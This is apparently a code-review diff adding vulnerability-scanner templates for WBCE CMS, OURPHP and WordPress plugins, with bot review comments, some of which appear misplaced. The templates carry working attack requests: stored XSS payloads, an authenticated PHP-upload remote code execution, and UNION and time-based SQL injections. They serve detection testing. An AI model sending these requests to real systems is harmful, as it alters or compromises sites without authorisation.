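Review bot: The template leaves a web-reachable PHP file at `/wp-content/uploads/cfom_files/<randstr>.php` on every host it matches and has no cleanup step, so a scan that confirms the bug also leaves an executable artefact behind; that side effect should be stated in the info block and the template should carry the repository's `intrusive` tag so default profiles do not run it unknowingly. The upload name is sent twice with different casing, `name={{randstr}}.pHp` in the query string and `filename="{{randstr}}.php"` in the multipart part, and the verification GET then applies `to_lower`; a comment explaining which of the two the plugin honours and why the case differs would stop the three from drifting apart in later edits. The uploaded file content has been stripped in this rendering, so the expected hash `fe5df26ce4ca0056ffae8854469c282f` cannot be checked against it here.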
@@ -0,0 +1,100 @@
+id: CVE-2022-45037
+
+info:
+ name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
+ author: theamanrawat
+ severity: medium
+ description: |
+ A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.
+ reference:
+ - https://github.com/WBCE/WBCE_CMS
+ - https://shimo.im/docs/dPkpKPQEjXfvYoqO/read
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-45037
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-45037
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,wbce,cms,authenticated
+
+http:
+ - raw:
+ - |
+ GET /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
+
+ - |
+ GET /admin/users/index.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/users/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ formtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
+
+ - |
+ GET /admin/users/ HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_5
+ words:
+ - ""
+ - "SESSION_TIMEOUT"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: username_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="username_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: password_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="password_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: formtoken
+ part: body
+ group: 1
+ regex:
+ - 'name="formtoken" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: username_fieldname_2
+ part: body
+ group: 1
+ regex:
+ - 'name="username_fieldname" value="(.*)"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml
new file mode 100644
index 0000000000..7009de52f6
--- /dev/null
+++ b/http/cves/2022/CVE-2022-45038.yaml
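Review bot: The fourth request creates a permanent, active user `test-{{randstr}}` in group 1 (`groups%5B%5D=1&active%5B%5D=1`, presumably the administrator group — confirm) with a random password and never removes it, so every positive scan leaves an extra account on the target; state that in the info block and tag the template as `intrusive`. The account e-mail uses a real third-party domain, `email={{randstr}}%40gmail.com`; a reserved domain such as `example.com` avoids the target sending mail to an address it does not own. The `username_fieldname_2` extractor duplicates `username_fieldname` with the same regex, and the greedy `(.*)"` in all four extractors will over-capture if other attributes follow the value on the same line, so `(.*?)` is safer; a comment that `_2` exists to re-read the field name from the third response would explain the duplication.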
@@ -0,0 +1,100 @@
+id: CVE-2022-45038
+
+info:
+ name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
+ author: theamanrawat
+ severity: medium
+ description: |
+ A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.
+ reference:
+ - https://github.com/WBCE/WBCE_CMS
+ - https://shimo.im/docs/Ee32MrJd80iEwyA2/read
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-45038
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-45038
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,wbce,cms,authenticated
+
+http:
+ - raw:
+ - |
+ GET /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
+
+ - |
+ GET /admin/settings/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/settings/save.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ advanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=
+
+ - |
+ GET /search/index.php HTTP/1.1
+ Host: {{Hostname}}
+
cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Results For"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: username_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="username_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: password_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="password_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: formtoken
+ part: body
+ group: 1
+ regex:
+ - 'name="formtoken" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: app_name
+ part: body
+ group: 1
+ regex:
+ - 'name="app_name" value="(.*?)"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml
new file mode 100644
index 0000000000..46bdcc2c61
--- /dev/null
+++ b/http/cves/2022/CVE-2022-46020.yaml
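Review bot: The `POST /admin/settings/save.php` body overwrites every basic setting with hard-coded values — `default_template=wbcezon`, `default_theme=wbce_flat_theme`, `default_language=EN`, `default_timezone=0`, `search=public`, the empty `wbmailer_*` fields and the rest — while only `app_name` is read back from the settings page, so on a site configured differently a positive scan permanently replaces the target's configuration, not just its footer, and the injected `website_footer` itself is left in place afterwards. Either extract the current values the way `app_name` is extracted, or document the clobbering in the info block and tag the template as `intrusive`. The `app_name` extractor uses the lazy `(.*?)"` while the other three extractors here use greedy `(.*)"`; the lazy form is the correct one and should be used throughout.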
@@ -0,0 +1,131 @@
+id: CVE-2022-46020
+
+info:
+ name: WBCE CMS v1.5.4 - Remote Code Execution
+ author: theamanrawat
+ severity: critical
+ description: |
+ WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
+ reference:
+ - https://github.com/WBCE/WBCE_CMS
+ - https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-46020
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-46020
+ cwe-id: CWE-434
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,rce,wbce,cms,authenticated
+
+http:
+ - raw:
+ - |
+ GET /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
+
+ - |
+ GET /admin/settings/index.php?advanced=yes HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/settings/save.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true§ion_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=
+
+ - |
+ POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988
+
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="reqid"
+
+ test
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="cmd"
+
+ upload
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="target"
+
+ l1_Lw
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php"
+ Content-Type: application/x-php
+
+
+
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="mtime[]"
+
+ test
+ -----------------------------213974337328367932543216511988--
+
+ - |
+ GET /media/{{randstr}}.php HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_6
+ words:
+ - "751a8ba516522786d551075a092a7a84"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: username_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="username_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: password_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="password_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: formtoken
+ part: body
+ group: 1
+ regex:
+ - 'name="formtoken" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: app_name
+ part: body
+ group: 1
+ regex:
+ - 'name="app_name" value="(.*)"'
+ internal: true
diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml
new file mode 100644
index 0000000000..687d510dd4
--- /dev/null
+++ b/http/cves/2023/CVE-2023-1020.yaml
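Review bot: The `save.php` request resets the site's identity — `website_title=test` plus empty `website_description`, `website_keywords`, `website_header` and `website_footer` — and replaces every advanced setting with fixed values, and the file uploaded to `/media/{{randstr}}.php` is never removed; both effects outlive the scan and should be stated in the info block, with the template tagged `intrusive`. The `app_name` extractor uses greedy `name="app_name" value="(.*)"` whereas CVE-2022-45038 in this commit uses `(.*?)`; the greedy form captures up to the last quote on the line and breaks if further attributes follow, so align it with the lazy form. As rendered, `&section_blocks=true` appears as `§ion_blocks=true`; confirm the committed file carries the literal ampersand. The hunk header announces 131 lines but only 127 are visible here, so a few body lines appear to have been dropped by the renderer rather than by the commit.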
@@ -0,0 +1,47 @@
+id: CVE-2023-1020
+
+info:
+ name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
+ reference:
+ - https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff
+ - https://wordpress.org/plugins/wp-shoutbox-live-chat/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-1020
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-1020
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat
+
+http:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "c8c605999f3d8352d7bb792cf3fdb25b"
+ - "no_participation"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml
new file mode 100644
index 0000000000..fc9652304d
--- /dev/null
+++ b/http/cves/2023/CVE-2023-30210.yaml
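Review bot: The `tags` line omits `unauthenticated` even though the description states the AJAX action is reachable by unauthenticated users; the sibling templates in this commit (CVE-2023-30210, advanced-booking-calendar-sqli) carry that tag, so for consistency and filterability I would make it `tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,unauthenticated`. The advanced-booking-calendar template also records a `remediation:` line; if the fixed plugin version is known, adding `remediation: <FIXED_VERSION — fill in from the wpscan reference>` here would bring the metadata in line.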
@@ -0,0 +1,39 @@
+id: CVE-2023-30210
+
+info:
+ name: OURPHP <= 7.2.0 - Cross Site Scripting
+ author: theamanrawat
+ severity: medium
+ description: |
+ OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.
+ reference:
+ - https://www.ourphp.net/
+ - https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-tz-php-Reflection-xss/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-30210
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,xss,ourphp,unauthenticated
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "barmemCachedPercent"
+ - "swapPercent"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml
new file mode 100644
index 0000000000..29e6cf6214
--- /dev/null
+++ b/http/cves/2023/CVE-2023-30212.yaml
@@ -0,0 +1,38 @@
+id: CVE-2023-30212
+
+info:
+ name: OURPHP <= 7.2.0 - Cross Site Scripting
+ author: theamanrawat
+ severity: medium
+ description: |
+ OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
+ reference:
+ - https://www.ourphp.net/
+ - https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-30212
+ classification:
+ cve-id: CVE-2023-30212
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,xss,ourphp
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "location.href='../..'"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
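Review bot: The first body `words` entry is the empty string `""` and the `callback=` query value is likewise empty, so as rendered here the template matches any OURPHP page that prints `barmemCachedPercent`/`swapPercent`, without confirming that anything is reflected; this may be the page's extraction dropping an HTML-tag marker from both places, but the committed file should be checked so that the word matcher holds the same marker that is sent in `callback`. The `info` block also lacks the `classification:` section that the CVE-2023-30212 template in this same commit carries; I would add `classification:` with `cve-id: CVE-2023-30210` and `cwe-id: CWE-79` so the CVE id is machine-readable, as it is in the other CVE templates here.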
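Review bot: The description has a typo, `vulnerale` should read `vulnerable`, which I cannot fix from the hunk lines but should be corrected before merge. As rendered, the `out=` value is empty and the only body match is `location.href='../..'`, which looks like the normal logout redirect rather than a reflected marker, so the template as shown would fire on any OURPHP instance, patched or not; if an HTML-tag marker was dropped by extraction this is moot, otherwise the word matcher should carry the marker that is sent in `out`. For parity with CVE-2023-30210 in this commit, `cwe-id: CWE-79` under `classification:` and, if the endpoint is reachable without a session, the `unauthenticated` tag would also belong here.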
diff --git a/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
new file mode 100644
index 0000000000..ca7981dbda
--- /dev/null
+++ b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
@@ -0,0 +1,34 @@
+id: advanced-booking-calendar-sqli
+
+info:
+ name: Advanced Booking Calendar < 1.6.2 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address.
+ remediation: Fixed in version 1.6.2
+ reference:
+ - https://wpscan.com/vulnerability/bac7b590-70de-45b3-bdc2-19f90524ca39
+ - https://wordpress.org/plugins/advanced-booking-calendar/
+ metadata:
+ verified: "true"
+ tags: sqli,wpscan,wordpress,wp-plugin,wp,advanced-booking-calendar,unauthenticated
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ calendarId=1)+AND+(SELECT+2065+FROM+(SELECT(SLEEP(6)))jtGw)+AND+(5440=5440&from=2010-05-05&to=2010-05-09&action=abc_booking_getBookingResult
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "abc-result-header")'
+ condition: and
diff --git a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
new file mode 100644
index 0000000000..694413d2b4
--- /dev/null
+++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
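Review bot: The description reads `leading an unauthenticated SQL injection issue` and capitalises `Unauthenticated` mid-sentence; it should say `leading to an unauthenticated SQL injection issue` with lowercase `unauthenticated`, which has to be fixed in the template text since hunk lines are not editable here. Unlike the CVE templates in this commit, this one has no `classification:` block; adding `classification:` with `cwe-id: CWE-89` keeps the weakness class queryable for non-CVE templates too. Detection rests on a single `duration>=6` observation with no baseline request, so a slow or overloaded target can produce a false positive; this is the repository's usual pattern and may be acceptable, but the same caveat applies to the wp-autosuggest hunk that follows.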
@@ -0,0 +1,28 @@
+id: wp-autosuggest-sql-injection
+
+info:
+ name: WP AutoSuggest 0.24 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/9188
+ - https://wordpress.org/plugins/wp-autosuggest/
+ metadata:
+ verified: "true"
+ tags: sqli,wordpress,wp-plugin,wp,wp-autosuggest
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(content_type, "text/xml")'
+ - 'contains(body, "")'
+ condition: and
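Review bot: The last DSL condition `'contains(body, "")'` is vacuously true, so as rendered it adds no evidence and the match reduces to timing plus a `text/xml` content type; this is probably an XML tag lost to the page's extraction, but the committed file should be checked to confirm a real response marker is present, otherwise the condition should be dropped rather than kept as a no-op. The description does not name the injectable parameter or the affected versions, although the request path shows it is `wpas_keys` on `autosuggest.php` and the title says 0.24; stating that in the description (and, as elsewhere in this commit, adding `classification:` with `cwe-id: CWE-89` and the `unauthenticated` tag) would make the template self-explanatory. The note on single-observation time-based detection given on the advanced-booking-calendar hunk applies here as well.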